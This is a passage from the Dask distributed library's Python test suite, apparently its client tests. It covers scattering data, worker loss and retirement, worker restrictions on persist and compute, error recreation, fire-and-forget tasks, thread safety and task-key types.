for k, v in v["workers"].items():
assert v is not None
c.get_versions(check=True)
# smoke test for versions
# that this does not raise
v = c.get_versions(packages=["requests"])
assert v["client"]["packages"]["requests"] == requests.__version__
@gen_cluster(client=True)
async def test_async_get_versions(c, s, a, b):
await c.get_versions(check=True)
def test_threaded_get_within_distributed(c):
import dask.multiprocessing
for get in [dask.local.get_sync, dask.multiprocessing.get, dask.threaded.get]:
def f():
return get({"x": (lambda: 1,)}, "x")
future = c.submit(f)
assert future.result() == 1
@gen_cluster(client=True)
async def test_lose_scattered_data(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
await a.close()
await asyncio.sleep(0.1)
assert x.status == "cancelled"
assert x.key not in s.tasks
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_partially_lose_scattered_data(e, s, a, b, c):
x = await e.scatter(1, workers=a.address)
await e.replicate(x, n=2)
await a.close()
await asyncio.sleep(0.1)
assert x.status == "finished"
assert s.get_task_status(keys=[x.key]) == {x.key: "memory"}
@gen_cluster(client=True)
async def test_scatter_compute_lose(c, s, a, b):
[x] = await c.scatter([[1, 2, 3, 4]], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
z = c.submit(slowadd, x, y, delay=0.2)
await asyncio.sleep(0.1)
await a.close()
with pytest.raises(CancelledError):
await wait(z)
assert x.status == "cancelled"
assert y.status == "finished"
assert z.status == "cancelled"
@gen_cluster(client=True)
async def test_scatter_compute_store_lose(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
x = await c.scatter(1, workers=a.address)
xx = c.submit(inc, x, workers=a.address)
y = c.submit(inc, 1)
z = c.submit(slowadd, xx, y, delay=0.2, workers=b.address)
await wait(z)
await a.close()
while x.status == "finished":
await asyncio.sleep(0.01)
# assert xx.status == 'finished'
assert y.status == "finished"
assert z.status == "finished"
zz = c.submit(inc, z)
await wait(zz)
zkey = z.key
del z
while s.get_task_status(keys=[zkey]) != {zkey: "released"}:
await asyncio.sleep(0.01)
xxkey = xx.key
del xx
while x.key in s.tasks and zkey not in s.tasks and xxkey not in s.tasks:
await asyncio.sleep(0.01)
@gen_cluster(client=True)
async def test_scatter_compute_store_lose_processing(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
[x] = await c.scatter([1], workers=a.address)
y = c.submit(slowinc, x, delay=0.2)
z = c.submit(inc, y)
await asyncio.sleep(0.1)
await a.close()
while x.status == "finished":
await asyncio.sleep(0.01)
assert y.status == "cancelled"
assert z.status == "cancelled"
@gen_cluster()
async def test_serialize_future(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
future = c1.submit(lambda: 1)
result = await future
for ci in (c1, c2):
for ctxman in ci.as_current, lambda: temp_default_client(ci):
with ctxman():
future2 = pickle.loads(pickle.dumps(future))
assert future2.client is ci
assert stringify(future2.key) in ci.futures
result2 = await future2
assert result == result2
await c1.close()
await c2.close()
@gen_cluster()
async def test_temp_default_client(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c1):
assert default_client() is c1
assert default_client(c2) is c2
with temp_default_client(c2):
assert default_client() is c2
assert default_client(c1) is c1
await c1.close()
await c2.close()
@gen_cluster(client=True)
async def test_as_current(c, s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c):
assert Client.current() is c
with pytest.raises(ValueError):
Client.current(allow_global=False)
with c1.as_current():
assert Client.current() is c1
assert Client.current(allow_global=True) is c1
with c2.as_current():
assert Client.current() is c2
assert Client.current(allow_global=True) is c2
await c1.close()
await c2.close()
def test_as_current_is_thread_local(s):
l1 = threading.Lock()
l2 = threading.Lock()
l3 = threading.Lock()
l4 = threading.Lock()
l1.acquire()
l2.acquire()
l3.acquire()
l4.acquire()
def run1():
with Client(s["address"]) as c:
with c.as_current():
l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.acquire()
l4.release()
def run2():
with Client(s["address"]) as c:
with c.as_current():
l1.release()
l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
l4.acquire()
t1 = threading.Thread(target=run1)
t2 = threading.Thread(target=run2)
t1.start()
t2.start()
t1.join()
t2.join()
@gen_cluster()
async def test_as_current_is_task_local(s, a, b):
l1 = asyncio.Lock()
l2 = asyncio.Lock()
l3 = asyncio.Lock()
l4 = asyncio.Lock()
await l1.acquire()
await l2.acquire()
await l3.acquire()
await l4.acquire()
async def run1():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
await l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
await l3.acquire()
l4.release()
async def run2():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
l1.release()
await l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
await l4.acquire()
await asyncio.gather(run1(), run2())
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers_annotate(e, s, a, b, c):
with dask.annotate(workers=a.address, allow_other_workers=False):
L1 = [delayed(inc)(i) for i in range(4)]
with dask.annotate(workers=b.address, allow_other_workers=False):
total = delayed(sum)(L1)
with dask.annotate(workers=c.address, allow_other_workers=True):
L2 = [delayed(add)(i, total) for i in L1]
with dask.annotate(workers=b.address, allow_other_workers=True):
total2 = delayed(sum)(L2)
# TODO: once annotations are faithfully forwarded upon graph optimization,
# we shouldn't need to disable that here.
out = e.persist(L1 + L2 + [total, total2], optimize_graph=False)
await wait(out)
assert all(v.key in a.data for v in L1)
assert total.key in b.data
assert s.loose_restrictions == {total2.key} | {v.key for v in L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers_annotate2(e, s, a, b, c):
def key_to_worker(key):
return a.address
L1 = [delayed(inc)(i) for i in range(4)]
for x in L1:
assert all(layer.annotations is None for layer in x.dask.layers.values())
with dask.annotate(workers=key_to_worker):
out = e.persist(L1, optimize_graph=False)
await wait(out)
for x in L1:
assert all(layer.annotations is None for layer in x.dask.layers.values())
for v in L1:
assert s.worker_restrictions[v.key] == {a.address}
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
total2 = delayed(sum)(L2)
out = e.persist(
L1 + L2 + [total, total2],
workers=[a.address, b.address],
allow_other_workers=True,
)
await wait(out)
for v in L1 + L2 + [total, total2]:
assert s.worker_restrictions[v.key] == {a.address, b.address}
assert not any(c.address in r for r in s.worker_restrictions)
assert s.loose_restrictions == {total.key, total2.key} | {v.key for v in L1 + L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers_annotate(e, s, a, b, c):
with dask.annotate(workers=a.address, allow_other_workers=True):
L1 = [delayed(inc)(i) for i in range(4)]
with dask.annotate(workers=b.address, allow_other_workers=True):
total = delayed(sum)(L1)
with dask.annotate(workers=[c.address]):
L2 = [delayed(add)(i, total) for i in L1]
# TODO: once annotations are faithfully forwarded upon graph optimization,
# we shouldn't need to disable that here.
out = e.compute(L1 + L2 + [total], optimize_graph=False)
await wait(out)
for v in L1:
assert s.worker_restrictions[v.key] == {a.address}
for v in L2:
assert s.worker_restrictions[v.key] == {c.address}
assert s.worker_restrictions[total.key] == {b.address}
assert s.loose_restrictions == {total.key} | {v.key for v in L1}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
out = e.compute(
L1 + L2 + [total],
workers=[a.address, b.address],
allow_other_workers=True,
)
await wait(out)
for v in L1 + L2 + [total]:
assert s.worker_restrictions[v.key] == {a.address, b.address}
assert not any(c.address in r for r in s.worker_restrictions)
assert s.loose_restrictions == {total.key} | {v.key for v in L1 + L2}
@gen_cluster(client=True)
async def test_compute_nested_containers(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
x = da.ones(10, chunks=(5,)) + 1
future = c.compute({"x": [x], "y": 123})
result = await future
assert isinstance(result, dict)
assert (result["x"][0] == np.ones(10) + 1).all()
assert result["y"] == 123
@gen_cluster(client=True)
async def test_scatter_type(c, s, a, b):
[future] = await c.scatter([1])
assert future.type == int
d = await c.scatter({"x": 1.0})
assert d["x"].type == float
@gen_cluster(client=True)
async def test_retire_workers_2(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
await s.retire_workers(workers=[a.address])
assert b.data == {x.key: 1}
assert s.who_has == {x.key: {b.address}}
assert s.has_what == {b.address: {x.key}}
assert a.address not in s.workers
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_retire_many_workers(c, s, *workers):
futures = await c.scatter(list(range(100)))
await s.retire_workers(workers=[w.address for w in workers[:7]])
results = await c.gather(futures)
assert results == list(range(100))
while len(s.workers) != 3:
await asyncio.sleep(0.01)
assert len(s.has_what) == len(s.nthreads) == 3
assert all(future.done() for future in futures)
assert all(s.tasks[future.key].state == "memory" for future in futures)
for w, keys in s.has_what.items():
assert 15 < len(keys) < 50
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 3)] * 2,
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_weight_occupancy_against_data_movement(c, s, a, b):
s.extensions["stealing"]._pc.callback_time = 1000000
def f(x, y=0, z=0):
sleep(0.01)
return x
y = await c.scatter([[1, 2, 3, 4]], workers=[a.address])
z = await c.scatter([1], workers=[b.address])
futures = c.map(f, [1, 2, 3, 4], y=y, z=z)
await wait(futures)
assert sum(f.key in a.data for f in futures) >= 2
assert sum(f.key in b.data for f in futures) >= 1
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 10)],
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_distribute_tasks_by_nthreads(c, s, a, b):
s.extensions["stealing"]._pc.callback_time = 1000000
def f(x, y=0):
sleep(0.01)
return x
y = await c.scatter([1], broadcast=True)
futures = c.map(f, range(20), y=y)
await wait(futures)
assert len(b.data) > 2 * len(a.data)
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_add_done_callback(c, s, a, b):
S = set()
def f(future):
future.add_done_callback(g)
def g(future):
S.add((future.key, future.status))
u = c.submit(inc, 1, key="u")
v = c.submit(throws, "hello", key="v")
w = c.submit(slowinc, 2, delay=0.3, key="w")
x = c.submit(inc, 3, key="x")
u.add_done_callback(f)
v.add_done_callback(f)
w.add_done_callback(f)
await wait((u, v, w, x))
x.add_done_callback(f)
while len(S) < 4:
await asyncio.sleep(0.01)
assert S == {(f.key, f.status) for f in (u, v, w, x)}
@gen_cluster(client=True)
async def test_normalize_collection(c, s, a, b):
x = delayed(inc)(1)
y = delayed(inc)(x)
z = delayed(inc)(y)
yy = c.persist(y)
zz = c.normalize_collection(z)
assert len(z.dask) == len(y.dask) + 1
assert isinstance(zz.dask[y.key], Future)
assert len(zz.dask) < len(z.dask)
@gen_cluster(client=True)
async def test_normalize_collection_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=(5,))
y = x + 1
yy = c.persist(y)
z = y.sum()
zdsk = dict(z.dask)
zz = c.normalize_collection(z)
assert z.dask == zdsk # do not mutate input
assert len(z.dask) > len(zz.dask)
assert any(isinstance(v, Future) for v in zz.dask.values())
for k, v in yy.dask.items():
assert zz.dask[k].key == v.key
result1 = await c.compute(z)
result2 = await c.compute(zz)
assert result1 == result2
@pytest.mark.slow
def test_normalize_collection_with_released_futures(c):
da = pytest.importorskip("dask.array")
x = da.arange(2 ** 20, chunks=2 ** 10)
y = x.persist()
wait(y)
sol = y.sum().compute()
# Start releasing futures
del y
# Try to reuse futures. Previously this was a race condition,
# and the call to `.compute()` would error out due to missing
# futures on the scheduler at compute time.
normalized = c.normalize_collection(x)
res = normalized.sum().compute()
assert res == sol
@pytest.mark.xfail(reason="https://github.com/dask/distributed/issues/4404")
@gen_cluster(client=True)
async def test_auto_normalize_collection(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
assert len(x.dask) == 2
with dask.config.set(optimizations=[c._optimize_insert_futures]):
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
await wait(yy)
start = time()
future = c.compute(y.sum())
await future
end = time()
assert end - start < 1
start = time()
z = c.persist(y + 1)
await wait(z)
end = time()
assert end - start < 1
@pytest.mark.xfail(reason="https://github.com/dask/distributed/issues/4404")
def test_auto_normalize_collection_sync(c):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
wait(yy)
with dask.config.set(optimizations=[c._optimize_insert_futures]):
start = time()
y.sum().compute()
end = time()
assert end - start < 1
def assert_no_data_loss(scheduler):
for key, start, finish, recommendations, _ in scheduler.transition_log:
if start == "memory" and finish == "released":
for k, v in recommendations.items():
assert not (k == key and v == "waiting")
@gen_cluster(client=True)
async def test_interleave_computations(c, s, a, b):
import distributed
distributed.g = s
xs = [delayed(slowinc)(i, delay=0.02) for i in range(30)]
ys = [delayed(slowdec)(x, delay=0.02) for x in xs]
zs = [delayed(slowadd)(x, y, delay=0.02) for x, y in zip(xs, ys)]
total = delayed(sum)(zs)
future = c.compute(total)
done = ("memory", "released")
await asyncio.sleep(0.1)
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
assert_no_data_loss(s)
@pytest.mark.skip(reason="Now prefer first-in-first-out")
@gen_cluster(client=True)
async def test_interleave_computations_map(c, s, a, b):
xs = c.map(slowinc, range(30), delay=0.02)
ys = c.map(slowdec, xs, delay=0.02)
zs = c.map(slowadd, xs, ys, delay=0.02)
done = ("memory", "released")
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
@gen_cluster(client=True)
async def test_scatter_dict_workers(c, s, a, b):
await c.scatter({"a": 10}, workers=[a.address, b.address])
assert "a" in a.data or "a" in b.data
@pytest.mark.slow
@gen_test(timeout=180)
async def test_client_timeout():
c = Client("127.0.0.1:57484", asynchronous=True)
s = Scheduler(loop=c.loop, port=57484, dashboard_address=":0")
await asyncio.sleep(4)
try:
await s
except OSError: # port in use
await c.close()
return
try:
await c
await c.close()
finally:
await s.close()
@gen_cluster(client=True)
async def test_submit_list_kwargs(c, s, a, b):
futures = await c.scatter([1, 2, 3])
def f(L=None):
return sum(L)
future = c.submit(f, L=futures)
result = await future
assert result == 1 + 2 + 3
@gen_cluster(client=True)
async def test_map_list_kwargs(c, s, a, b):
futures = await c.scatter([1, 2, 3])
def f(i, L=None):
return i + sum(L)
futures = c.map(f, range(10), L=futures)
results = await c.gather(futures)
assert results == [i + 6 for i in range(10)]
@gen_cluster(client=True)
async def test_dont_clear_waiting_data(c, s, a, b):
x = await c.scatter(1)
y = c.submit(slowinc, x, delay=0.5)
while y.key not in s.tasks:
await asyncio.sleep(0.01)
key = x.key
del x
for i in range(5):
assert s.waiting_data[key]
await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_recreate_error_delayed(c, s, a, b):
x0 = delayed(dec)(2)
y0 = delayed(dec)(1)
x = delayed(div)(1, x0)
y = delayed(div)(1, y0)
tot = delayed(sum)(x, y)
f = c.compute(tot)
assert f.status == "pending"
error_f = await c._get_errored_future(f)
function, args, kwargs = await c._get_components_from_future(error_f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_futures(c, s, a, b):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
assert f.status == "pending"
error_f = await c._get_errored_future(f)
function, args, kwargs = await c._get_components_from_future(error_f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_collection(c, s, a, b):
b = db.range(10, npartitions=4)
b = b.map(lambda x: 1 / x)
b = b.persist()
f = c.compute(b)
error_f = await c._get_errored_future(f)
function, args, kwargs = await c._get_components_from_future(error_f)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
def make_err(x):
# because pandas would happily work with NaN
if x == 0:
raise ValueError
return x
df2 = df.a.map(make_err)
f = c.compute(df2)
error_f = await c._get_errored_future(f)
function, args, kwargs = await c._get_components_from_future(error_f)
with pytest.raises(ValueError):
function(*args, **kwargs)
# with persist
df3 = c.persist(df2)
error_f = await c._get_errored_future(df3)
function, args, kwargs = await c._get_components_from_future(error_f)
with pytest.raises(ValueError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_array(c, s, a, b):
da = pytest.importorskip("dask.array")
pytest.importorskip("scipy")
z = (da.linalg.inv(da.zeros((10, 10), chunks=10)) + 1).sum()
zz = z.persist()
error_f = await c._get_errored_future(zz)
function, args, kwargs = await c._get_components_from_future(error_f)
assert "0.,0.,0." in str(args).replace(" ", "") # args contain actual arrays
def test_recreate_error_sync(c):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
with pytest.raises(ZeroDivisionError):
c.recreate_error_locally(f)
assert f.status == "error"
def test_recreate_error_not_error(c):
f = c.submit(dec, 2)
with pytest.raises(ValueError, match="No errored futures passed"):
c.recreate_error_locally(f)
@gen_cluster(client=True)
async def test_recreate_task_delayed(c, s, a, b):
x0 = delayed(dec)(2)
y0 = delayed(dec)(2)
x = delayed(div)(1, x0)
y = delayed(div)(1, y0)
tot = delayed(sum)([x, y])
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = await c._get_components_from_future(f)
assert f.status == "finished"
assert function.__name__ == "sum"
assert args == ([1, 1],)
assert function(*args, **kwargs) == 2
@gen_cluster(client=True)
async def test_recreate_task_futures(c, s, a, b):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 2)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, [x, y])
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = await c._get_components_from_future(f)
assert f.status == "finished"
assert function.__name__ == "sum"
assert args == ([1, 1],)
assert function(*args, **kwargs) == 2
@gen_cluster(client=True)
async def test_recreate_task_collection(c, s, a, b):
b = db.range(10, npartitions=4)
b = b.map(lambda x: int(3628800 / (x + 1)))
b = b.persist()
f = c.compute(b)
function, args, kwargs = await c._get_components_from_future(f)
assert function(*args, **kwargs) == [
3628800,
1814400,
1209600,
907200,
725760,
604800,
518400,
453600,
403200,
362880,
]
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
df2 = df.a.map(lambda x: x + 1)
f = c.compute(df2)
function, args, kwargs = await c._get_components_from_future(f)
expected = pd.DataFrame({"a": [1, 2, 3, 4, 5]})["a"]
assert function(*args, **kwargs).equals(expected)
# with persist
df3 = c.persist(df2)
# recreate_task_locally only works with futures
with pytest.raises(AttributeError):
function, args, kwargs = await c._get_components_from_future(df3)
f = c.compute(df3)
function, args, kwargs = await c._get_components_from_future(f)
assert function(*args, **kwargs).equals(expected)
@gen_cluster(client=True)
async def test_recreate_task_array(c, s, a, b):
da = pytest.importorskip("dask.array")
z = (da.zeros((10, 10), chunks=10) + 1).sum()
f = c.compute(z)
function, args, kwargs = await c._get_components_from_future(f)
assert function(*args, **kwargs) == 100
def test_recreate_task_sync(c):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 2)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, [x, y])
f = c.compute(tot)
assert c.recreate_task_locally(f) == 2
@gen_cluster(client=True)
async def test_retire_workers(c, s, a, b):
assert set(s.workers) == {a.address, b.address}
await c.retire_workers(workers=[a.address], close_workers=True)
assert set(s.workers) == {b.address}
while a.status != Status.closed:
await asyncio.sleep(0.01)
class MyException(Exception):
pass
@gen_cluster(client=True)
async def test_robust_unserializable(c, s, a, b):
class Foo:
def __getstate__(self):
raise MyException()
with pytest.raises(MyException):
future = c.submit(identity, Foo())
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable(c, s, a, b):
class Foo:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
future = c.submit(identity, Foo())
with pytest.raises(MyException):
await future
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable_function(c, s, a, b):
class Foo:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
def __call__(self, *args):
return 1
future = c.submit(Foo(), 1)
with pytest.raises(MyException):
await future
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_fire_and_forget(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.1)
import distributed
def f(x):
distributed.foo = 123
try:
fire_and_forget(c.submit(f, future))
while not hasattr(distributed, "foo"):
await asyncio.sleep(0.01)
assert distributed.foo == 123
finally:
del distributed.foo
while len(s.tasks) > 1:
await asyncio.sleep(0.01)
assert set(s.who_wants) == {future.key}
assert set(s.tasks) == {future.key}
@gen_cluster(client=True)
async def test_fire_and_forget_err(c, s, a, b):
fire_and_forget(c.submit(div, 1, 0))
await asyncio.sleep(0.1)
# erred task should clear out quickly
start = time()
while s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 1
def test_quiet_client_close(loop):
with captured_logger(logging.getLogger("distributed")) as logger:
with Client(
loop=loop,
processes=False,
dashboard_address=":0",
threads_per_worker=4,
) as c:
futures = c.map(slowinc, range(1000), delay=0.01)
sleep(0.200) # stop part-way
sleep(0.1) # let things settle
out = logger.getvalue()
lines = out.strip().split("\n")
assert len(lines) <= 2
for line in lines:
assert (
not line
or "Reconnecting" in line
or "garbage" in line
or set(line) == {"-"}
), line
@pytest.mark.slow
def test_quiet_client_close_when_cluster_is_closed_before_client(loop):
with captured_logger(logging.getLogger("tornado.application")) as logger:
cluster = LocalCluster(loop=loop, n_workers=1, dashboard_address=":0")
client = Client(cluster, loop=loop)
cluster.close()
client.close()
out = logger.getvalue()
assert "CancelledError" not in out
@gen_cluster()
async def test_close(s, a, b):
c = await Client(s.address, asynchronous=True)
future = c.submit(inc, 1)
await wait(future)
assert c.id in s.wants_what
await c.close()
while c.id in s.wants_what or s.tasks:
await asyncio.sleep(0.01)
def test_threadsafe(c):
def f(_):
d = deque(maxlen=50)
for i in range(100):
future = c.submit(inc, random.randint(0, 100))
d.append(future)
sleep(0.001)
c.gather(list(d))
total = c.submit(sum, list(d))
return total.result()
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(20) as e:
results = list(e.map(f, range(20)))
assert results and all(results)
del results
@pytest.mark.slow
def test_threadsafe_get(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
total += (x + random.randint(0, 20)).sum().compute()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(30) as e:
results = list(e.map(f, range(30)))
assert results and all(results)
@pytest.mark.slow
def test_threadsafe_compute(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
future = c.compute((x + random.randint(0, 20)).sum())
total += future.result()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
e = ThreadPoolExecutor(30)
results = list(e.map(f, range(30)))
assert results and all(results)
@gen_cluster(client=True)
async def test_identity(c, s, a, b):
assert c.id.lower().startswith("client")
assert a.id.lower().startswith("worker")
assert b.id.lower().startswith("worker")
assert s.id.lower().startswith("scheduler")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 2)
async def test_get_client(c, s, a, b):
assert get_client() is c
assert c.asynchronous
def f(x):
client = get_client()
future = client.submit(inc, x)
import distributed
assert not client.asynchronous
assert client is distributed.tmp_client
return future.result()
import distributed
distributed.tmp_client = c
try:
futures = c.map(f, range(5))
results = await c.gather(futures)
assert results == list(map(inc, range(5)))
finally:
del distributed.tmp_client
def test_get_client_no_cluster():
# Clean up any global workers added by other tests. This test requires that
# there are no global workers.
Worker._instances.clear()
msg = "No global client found and no address provided"
with pytest.raises(ValueError, match=fr"^{msg}$"):
get_client()
@gen_cluster(client=True)
async def test_serialize_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.arange(10, chunks=(5,)).persist()
def f(x):
assert isinstance(x, da.Array)
return x.sum().compute()
future = c.submit(f, x)
result = await future
assert result == sum(range(10))
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 1)
async def test_secede_simple(c, s, a):
def f():
client = get_client()
secede()
return client.submit(inc, 1).result()
result = await c.submit(f)
assert result == 2
@gen_cluster(client=True)
async def test_secede_balances(c, s, a, b):
"""Ensure that tasks scheduled from a seceded thread can be scheduled
elsewhere"""
def f(x):
client = get_client()
secede()
futures = client.map(inc, range(10), pure=False)
total = client.submit(sum, futures).result()
return total
futures = c.map(f, range(10), workers=[a.address])
results = await c.gather(futures)
# We dispatch 10 tasks and every task generates 11 more tasks
# 10 * 11 + 10
assert a.executed_count + b.executed_count == 120
assert a.executed_count >= 10
assert b.executed_count > 0
assert results == [sum(map(inc, range(10)))] * 10
@gen_cluster(client=True)
async def test_sub_submit_priority(c, s, a, b):
def func():
client = get_client()
f = client.submit(slowinc, 1, delay=0.5, key="slowinc")
client.gather(f)
future = c.submit(func, key="f")
while len(s.tasks) != 2:
await asyncio.sleep(0.001)
# lower values schedule first
assert s.tasks["f"].priority > s.tasks["slowinc"].priority, (
s.tasks["f"].priority,
s.tasks["slowinc"].priority,
)
def test_get_client_sync(c, s, a, b):
results = c.run(lambda: get_worker().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
results = c.run(lambda: get_client().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
@gen_cluster(client=True)
async def test_serialize_collections_of_futures(c, s, a, b):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = await c.scatter(ddf)
ddf2 = await future
df2 = await c.compute(ddf2)
assert_eq(df, df2)
def test_serialize_collections_of_futures_sync(c):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = c.scatter(ddf)
result = future.result()
assert_eq(result.compute(), df)
assert future.type == dd.DataFrame
assert c.submit(lambda x, y: assert_eq(x.compute(), y), future, df).result()
def _dynamic_workload(x, delay=0.01):
if delay == "random":
sleep(random.random() / 2)
else:
sleep(delay)
if x > 4:
return 4
secede()
client = get_client()
futures = client.map(
_dynamic_workload, [x + i + 1 for i in range(2)], pure=False, delay=delay
)
total = client.submit(sum, futures)
return total.result()
def test_dynamic_workloads_sync(c):
future = c.submit(_dynamic_workload, 0, delay=0.02)
assert future.result(timeout=20) == 52
@pytest.mark.slow
def test_dynamic_workloads_sync_random(c):
future = c.submit(_dynamic_workload, 0, delay="random")
assert future.result(timeout=20) == 52
@pytest.mark.xfail(COMPILED, reason="Fails with cythonized scheduler")
@gen_cluster(client=True)
async def test_bytes_keys(c, s, a, b):
key = b"inc-123"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is bytes
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
async def test_unicode_ascii_keys(c, s, a, b):
uni_type = str
key = "inc-123"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
